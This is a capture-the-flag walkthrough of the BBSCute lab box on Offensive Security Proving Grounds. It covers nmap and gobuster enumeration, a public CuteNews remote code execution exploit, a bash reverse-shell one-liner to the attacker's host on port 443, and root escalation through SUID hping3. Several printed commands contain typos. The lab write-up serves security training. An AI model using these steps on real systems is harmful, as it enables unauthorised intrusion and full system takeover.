PG — BBSCute— Walkthrough (Offensive Security Proving Grounds Play Boxes)
This article aims to walk you through BBSCute box, created by foxlox and hosted on Offensive Security’s Proving Grounds Labs. Anyone who has access to Vulnhub and Offensive Security’s Proving Grounds Play or Practice can try to pwn this Linux box, this is a kind of boot2root, easy, and fun box. Hope you enjoy reading the walkthrough!
As we are already provided with IP address of the box, we will scan it via Nmap.
We are going to scan the IP for 1000 default ports by typing the following command on our terminal.
After a short while, we have got our results as shown below:
To gather further information on ports found by nmap, we will add some more arguments specifying open ports. -sV will scan to show service versions of applications on open ports, and -sC will run default scripts on services in order to check whether there is a vulnerability.
nmap -p 22,80,88,110,995 192.168.x.x -sV -sC
In a short while, we have got our results and more details regarding open ports. And we decide to start enumeration on port 80 as there is a default apache web server since port 22 is not a logical starting point because it does not provide us with a broad attack surface as an http server does. Port 88, hosting an nginx web server but it throws out 404 Not Found error while trying to connect, is an hhtp server as well, but it does not reveal anything to our interest. Ports 110 and 995 also do not provide us with any useful path to follow.
We open our browser and type IP address of the box.
Now, we will use gobuster to bruteforce directories to see if we have something useful. We will use -u argument to specify URL and -w argument to provide the wordlist we want to use for directory bruteforcing. And not to create a noise on the server or not to be blocked by the firewall if there is one on the server, we will specify threads as 5 by -t argument.
gobuster dir -u http://192.168x.x/ -w /usr/share/wordlists/dirb/common.txt -t 5
Gobuster reveals several directories, but the only useful one is index.php, and it uncovers a login page.
After trying to log in with common credentials such as admin:admin, we are not able to log in on the server. Then, we see that under login section of the web page, the name and version number of CMS are visible, which will be investigated further.
Thus, we searchsploit the name and version number on our terminal in order to see if there is a public exploit.
There are four different public exploits, we will not use Metasploit to maintain our skills sharp and check python script, which is 48800.py, as it gives us the opportunity to have Remote Code Execution (RCE) on the server.
Before attempting to use, we need to change several lines of the exploit code to make it work for our web server. So, the first line, which needs to be altered, is shown below;
As we do not have a directory called /CuteNews on our web server, we will delete it for this and for the following lines, otherwise our python script will not work!
We are ready to exploit the web server via the python script we edited.
We execute our python script to connect to the web server:
The exploit asks for URL of the web server we want to exploit and we provide it. After typing our URL, we hit enter, and we get command execution on the web server.
To have a netcat shell, we set up a netcat listener on port 443, which is a trustable and secure port, and often works for a reverse shell, in our terminal.
Then, we type the following command to execute on the server for a reverse shell.
echo ‘bash -i >& /dev/tcp192.168.x.x/443 0>&1’ | bash
And, we have got a netcat shell on the web server.
Now, we can look for our low shell hash with the following command and concatenate it.
find / -name local.txt 2>/dev/null
Privilege Escalation of this box was easy, there are some initial enumeration steps for privilege escalation after getting low shell, and the first one tried on this box, which was checking sudo permissions for the current user by typing sudo -l on the terminal, is the first step for privilege escalation.
We see that we can execute hping3 with sudo permissions.
We execute /bin/sh -i, and get a TTY shell with the following command.
python3 -c “__import__(‘’pty).spawn(‘/bin/bash’)”
Now, we are able to execute hping3, and if we execute it as sudo -l output suggest, it will ask for a password. Since we also see that hping3 has SUID binaries, we check GTFOBins, and see that we are able to execute commands as root user via hping3 terminal.
We will get hping3 terminal through just typing hping3, and then we will escalate our privilege as shown below.
As we see, we are able to execute commands as root since our Effective User Id is root. So let us concatenate root hash.
Now we have full authority on the box. Enjoy!
Metasploit | Penetration Testing Software, Pen Testing Security | Metasploit
Two new modules and a few enhancements and fixes, including improvements to the analyze command.... In the spirit of…
Offensive Security's Exploit Database Archive
CuteNews 2.1.2 - Remote Code Execution. CVE-2019-11447 . webapps exploit for PHP platform
netcat - Wikipedia
netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections…
What Is a Reverse Shell | Acunetix
To gain control over a compromised system, an attacker usually aims to gain interactive shell access for arbitrary…
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix…
Proving Grounds Play and Practice | Offensive Security
Practice your pentesting skills in a standalone, private lab environment with the additions of PG Play and PG Practice…
A list of useful payloads and bypass for Web Application Security and Pentest/CTF - swisskyrepo/PayloadsAllTheThings
Linux Privilege Escalation using SUID Binaries
In ourarticle we have discussed "Privilege Escalation in Linux using etc/passwd file" and today we will learn…